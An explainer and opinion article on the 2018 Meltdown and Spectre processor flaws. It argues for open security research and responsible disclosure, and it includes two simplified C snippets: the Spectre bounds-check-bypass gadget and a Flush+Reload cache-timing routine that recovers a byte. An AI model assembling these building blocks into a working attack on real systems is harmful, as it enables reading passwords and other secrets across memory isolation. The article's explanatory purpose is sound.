Major Computer Chip Bugs Show the Need for Open Security Research
Have you heard about "Meltdown" and "Spectre"? Here's what you need to know.
2018 rang in with a bang in the computer security world, as two serious and extensive processor vulnerabilities were disclosed in early January. Last week, researchers with Google's Project Zero and various universities and private security shops announced their troubling finding that the majority of the world's computer chips manufactured over the past two decades are vulnerable to two attacks, dubbed "Meltdown" and "Spectre." (Yes, that means your computer, smartphone, and tablet are affected.)
The researchers who discovered the bugs have assembled a helpful website full of information about the vulnerabilities, with links to incident responses by various technology companies.
Computer programs are not supposed to be able to read certain data from other programs. Yet the Meltdown and Spectre hardware bugs could allow a malicious actor to bypass memory isolation and access "secrets stored in the memory of other running programs"—like passwords, photos, emails, communications, and personal documents.
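To make that concrete, the publicly released Spectre paper centers on a deceptively ordinary code pattern. The C sketch below is a simplified rendering of that pattern (the array names and sizes here are illustrative, not drawn from any real exploit): a bounds check that the processor's branch predictor guesses past lets a secret byte be read speculatively and leave a trace in the cache.

```c
#include <stddef.h>
#include <stdint.h>

uint8_t array1[16];
size_t  array1_size = 16;
uint8_t array2[256 * 512];   /* "probe" array: one cache line per possible byte value */

/* Simplified bounds-check-bypass pattern ("Spectre variant 1").
 * If the branch predictor guesses that the bounds check will pass,
 * the CPU speculatively reads array1[x] even when x points far
 * outside the array, then uses that secret byte to touch one line
 * of array2. The mis-speculated work is discarded, but the cache
 * footprint remains, and a timing attack can recover the byte. */
void victim_function(size_t x) {
    if (x < array1_size) {
        uint8_t secret = array1[x];                  /* speculative, possibly out-of-bounds read */
        volatile uint8_t tmp = array2[secret * 512]; /* encodes the byte as a cache-line access */
        (void)tmp;
    }
}
```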
While serious vulnerabilities affecting browsers and other software are unfortunately rather common, the Spectre and Meltdown bugs are noteworthy both for the extent of their reach and the fact that they affect the very chips that make all of our devices run.
Both exploits affect processors in similar ways, but there are differences between them. The Meltdown vulnerability affects Intel and Apple processors and effectively "melts down" the memory protections that the hardware normally enforces. Meltdown mostly concerns desktop, laptop, and cloud computers. The Spectre vulnerability, on the other hand, tricks Intel, ARM, and AMD chips into speculatively executing instructions that can expose sensitive information to other applications, making it a problem for smartphone and tablet users as well. While patches for both vulnerabilities have been pushed out at the software level, the researchers note that the Spectre bug does not have an easy fix and will "haunt us for some time." (Also noteworthy: the Meltdown patch, based on a technique called KAISER, may slow down processing speeds by up to 30 percent—an annoying headache that will surely make users grumble.)
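How does an attacker actually read a secret back out of the cache? The sketch below shows the general idea behind the "Flush+Reload" timing technique the researchers describe, again in deliberately simplified, illustrative form. Real exploits also mistrain the branch predictor beforehand, randomize the probe order, and compare timings against a calibrated threshold rather than simply taking the fastest load.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, __rdtscp (GCC/Clang on x86) */

/* Before the victim runs, flush every candidate line of the probe
 * array out of the cache. */
void flush_probe_array(uint8_t *array2) {
    for (int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * 512]);
}

/* After the victim runs, time a load from each candidate line. The
 * one line the victim touched speculatively loads noticeably faster
 * than the rest, revealing the secret byte value. */
int recover_byte(uint8_t *array2) {
    unsigned int aux;
    int best_guess = -1;
    uint64_t best_time = UINT64_MAX;
    for (int guess = 0; guess < 256; guess++) {
        volatile uint8_t *addr = &array2[guess * 512];
        uint64_t start = __rdtscp(&aux);          /* RDTSCP waits for prior instructions */
        (void)*addr;                              /* reload the candidate line */
        uint64_t elapsed = __rdtscp(&aux) - start;
        if (elapsed < best_time) {                /* cached line == fastest load */
            best_time = elapsed;
            best_guess = guess;
        }
    }
    return best_guess;
}
```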
Intel's stock price took a mighty hit upon news of the exploits, although the characterization of Meltdown and Spectre as an "Intel bug" is not quite right. The vulnerabilities affect chips from ARM and AMD as well, not to mention Apple hardware.
Some have speculated that fully steeling systems against these bugs will require a hardware recall and a redesign of how processors are made, perhaps especially so in the case of the tricky Spectre bug. A security alert from US-CERT, the Department of Homeland Security's primary cybersecurity coordination body, notes that "patching may not fully address these vulnerabilities" because they exist "in CPU architecture rather than software." This means that the software fixes pushed so far may only be an intermediate step toward a full solution. Yet Intel, perhaps not surprisingly, has sought to downplay the general threat, stating that a software patch will be sufficient to render its products "immune" from the exploits.
How to protect yourself
So what do the Spectre and Meltdown bugs mean for the average person? Don't panic: it's highly unlikely that hackers would first look to target average Joes like you and me. They would be much more likely to attack the big guys like Amazon Web Services and Microsoft Azure, because that's where the money is. Still, it's always good to be proactive.
If you haven't already, it's probably a good idea to cease sharing sensitive data on affected devices—which includes basically all computing products, save for perhaps the trusty Nokia 3310—until you verify that the necessary fixes have been installed.
While no malicious uses of the vulnerabilities have been discovered in the wild yet, proof-of-concept attacks have been successfully demonstrated. Technology companies have been scrambling behind the scenes to issue patches before hackers have a chance to exploit the flaws. Some of these patches have been pushed out automatically by firms like Apple and Google, but it never hurts to check just to be sure.
Even if the necessary security patches are installed on your device, there is still a chance that issues will remain, that a hardware recall and replacement will truly be needed, or that the patches themselves could become a new vector for another exploit. As such, this should serve as yet another reminder of the importance of good digital hygiene. It is our responsibility to safeguard our own data and ensure that we are being as prudent as possible with our online sharing. You can even use this as an excuse to adopt a late New Year's resolution: take your data protection seriously in 2018!
Why we need open security research
This is not merely a story about our vulnerable digital reality. It is equally a case study of the importance of open security research, and a cautionary tale about what can happen when knowledge of vulnerabilities is concealed or even weaponized.
Journalist Andy Greenberg of WIRED has published an excellent exposition of how disparate teams of security researchers across the globe independently discovered the chip bugs. He notes the curious coincidence that four separate groups of computer scientists should somehow all locate the world's worst CPU vulnerabilities within weeks of each other. After all, these bugs may have existed for decades. Why would there be a veritable tsunami of disclosures in this particular year?
Greenberg traces the genesis of this particular "bug collision"—or simultaneous vulnerability discovery—to a blog post by security researcher Anders Fogh last July, in which he brainstormed how an industry-standard speed-boosting microprocessor feature called "speculative execution" could be exploited to undermine security. This got the gears turning for other researchers, who started to noodle over exactly how processors could be vulnerable in other ways. Months later, two separate groups of researchers, from the Graz University of Technology in Austria and the German security firm Cyberus Technology, applied Fogh's techniques and discovered the troubling bugs.
Meanwhile, a 22-year-old hacker named Jann Horn, who had recently started a stint at Google's bug-finding Project Zero, had independently discovered the vulnerabilities weeks before Fogh's clarion call while poring over Intel's chip documentation for an unrelated project. And Paul Kocher, founder of San Francisco's Cryptography Research, likewise channeled his own suspicions about speculative execution into identifying the bugs without input from any other team.
When these researchers went to responsibly report their findings to chipmakers like Intel, they were surprised to learn that others had preceded them. Industry developers from Intel, Amazon, and Google appear to have been aware of the issue by October, as their contributions to the popular Linux kernel mailing list suggested they were already interested in the KAISER patch.
On the one hand, this is a story about what is possible when bright and public-minded security researchers are free to tinker with systems and responsibly report the vulnerabilities they find. But on the other hand, it raises uncomfortable questions about the extent of such deeply threatening vulnerabilities and whether other, less public-minded parties may have been exploiting them all along.
The researchers surveyed in Greenberg's article relate a creeping suspicion that they were surely not the first to discover these bugs. Many of them are quite certain that intelligence agencies were aware of the flaws, and perhaps even exploited them, for years. For what it's worth, the National Security Agency denies that it even knew about the flaws, let alone abused them. Yet many Americans will surely find this hard to believe.
Regardless of whether or not intelligence agencies exploited these particular bugs, the fact of the matter is that they have stockpiled and deployed a trove of zero-day vulnerabilities for years in the service of surveillance missions. As the recent Shadow Brokers saga illustrates, these "assets" can quickly turn into dangerous liabilities should they be released into the wild. This kind of short-sighted bug hiding ultimately makes everyone less safe online, and can ironically even undermine the very intelligence goals the bugs were initially meant to serve.
The bottom line is that security is hard. We need both to actively manage our own data sharing and to promote a policy environment that protects and encourages responsible vulnerability disclosure. We can't afford to wait for the next security catastrophe before we start taking these necessary steps.